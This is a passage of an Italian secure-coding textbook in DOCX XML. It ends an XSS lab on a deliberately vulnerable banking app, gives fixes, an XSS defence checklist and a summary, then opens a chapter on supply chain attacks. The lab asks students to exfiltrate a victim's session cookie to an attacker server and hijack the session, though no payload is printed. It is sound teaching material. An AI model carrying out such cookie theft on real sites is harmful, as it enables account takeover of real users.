        <w:t xml:space="preserve">. Fa in modo che il payload inietti il cookie verso quel server. Mostra al docente che entri come l’utente vittima nel tuo browser.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="369"/>
    <w:bookmarkStart w:id="370" w:name="correzione-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni vulnerabilità:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifica nel codice di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il punto in cui il dato utente viene inserito in HTML senza escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applica la correzione: rimuovere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, oppure usare Bleach se serve un po’ di HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Imposta cookie HttpOnly + Secure + SameSite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi una CSP minimale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprova gli attacchi: devono fallire tutti</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="370"/>
    <w:bookmarkStart w:id="371" w:name="estensione-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estensione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configura una CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">strict-dynamic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nonce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(token per script) per BancaPiccola-secure. Studio: leggi le linee guida W3C sul Content Security Policy Level 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="371"/>
    <w:bookmarkEnd w:id="372"/>
    <w:bookmarkStart w:id="373" w:name="checklist-operativa-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="550" w:name="sec_8_11"/>
      <w:r>
        <w:t xml:space="preserve">8.11 Checklist operativa XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai concatenare input utente in HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(usare sempre template engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Escape automatico attivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel template engine (Jinja2 lo fa di default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Niente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su contenuto utente (e niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">v-html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizzare con Bleach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(whitelist) se serve un po’ di HTML formattato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie sessione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly = True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(impedisce JavaScript di leggerli)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie sessione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Secure = True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(HTTPS only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie sessione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite = Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(protezione CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">restrittiva (minimo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">default-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai dati utente in attributi URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href=...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) senza validazione dello schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai dati utente in event handler inline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onclick=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validazione tipo input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in supporto (mai in sostituzione dell’escape)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(XSS + HTTP = doppia perdita)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="373"/>
    <w:bookmarkStart w:id="374" w:name="riepilogo-del-capitolo-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="551" w:name="sec_8_12"/>
      <w:r>
        <w:t xml:space="preserve">8.12 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) permette a un attaccante di iniettare ed eseguire JavaScript dentro la pagina di un altro sito,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bypassando la Same-Origin Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dall’interno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante diventa l’utente nel browser della vittima: può rubare cookie di sessione, modificare la pagina, fare richieste autenticate, fare phishing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tre tipi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(link malevolo, click singolo),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(payload salvato sul server, colpisce tutti gli utenti che caricano la pagina infetta),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lato browser, materia avanzata).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">difesa principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">escape automatico dell’output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Jinja2/Flask, React, Vue, Angular fanno escape di default.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai disabilitarlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su contenuto utente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese in profondità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(JavaScript non vede il cookie di sessione),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(solo HTTPS),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(anti-CSRF), header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(limita gli script eseguibili), input validation in supporto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai costruito un attacco XSS reale (Reflected + Stored) su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, hai esfiltrato cookie verso un server attaccante, hai applicato la correzione (rimozione di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ cookie HttpOnly).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Software Supply Chain Failures.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando il bug non è nel tuo codice ma in una libreria che usi: Log4Shell, XZ Utils, npm malevoli. È OWASP A03 (promosso al 3° posto nel 2025) — il problema che riguarda l’80% del codice di un’app moderna.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="374"/>
    <w:bookmarkEnd w:id="375"/>
    <w:bookmarkStart w:id="413" w:name="X6797184e9d90aed7349b6ef5312703d4ad3a7ef"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="552" w:name="ch_9"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 9 — Software Supply Chain Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 0 (pip, requirements.txt), 4 (OWASP A03, CVE, CVSS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 ore con il laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una statistica che dovrebbe inquietare chiunque scriva codice oggi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">secondo studi di Sonatype, GitHub e Snyk, l’80-90% del codice di una tipica applicazione moderna NON è scritto dal team di sviluppo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È codice che arriva da librerie open source, framework, plugin, dipendenze indirette (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dipendenze delle dipendenze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Per un’app Python media: tu scrivi 5.000 righe, importi 200.000 righe da librerie esterne. Per un’app JavaScript moderna, la proporzione è ancora più estrema: a volte 1.000 righe tue contro 2 milioni di dipendenze.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tutto quel codice è codice tuo agli effetti pratici.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se ha bug di sicurezza, sono bug della tua applicazione. Se è compromesso da un attaccante, è la tua applicazione a essere compromessa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo è il dominio del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
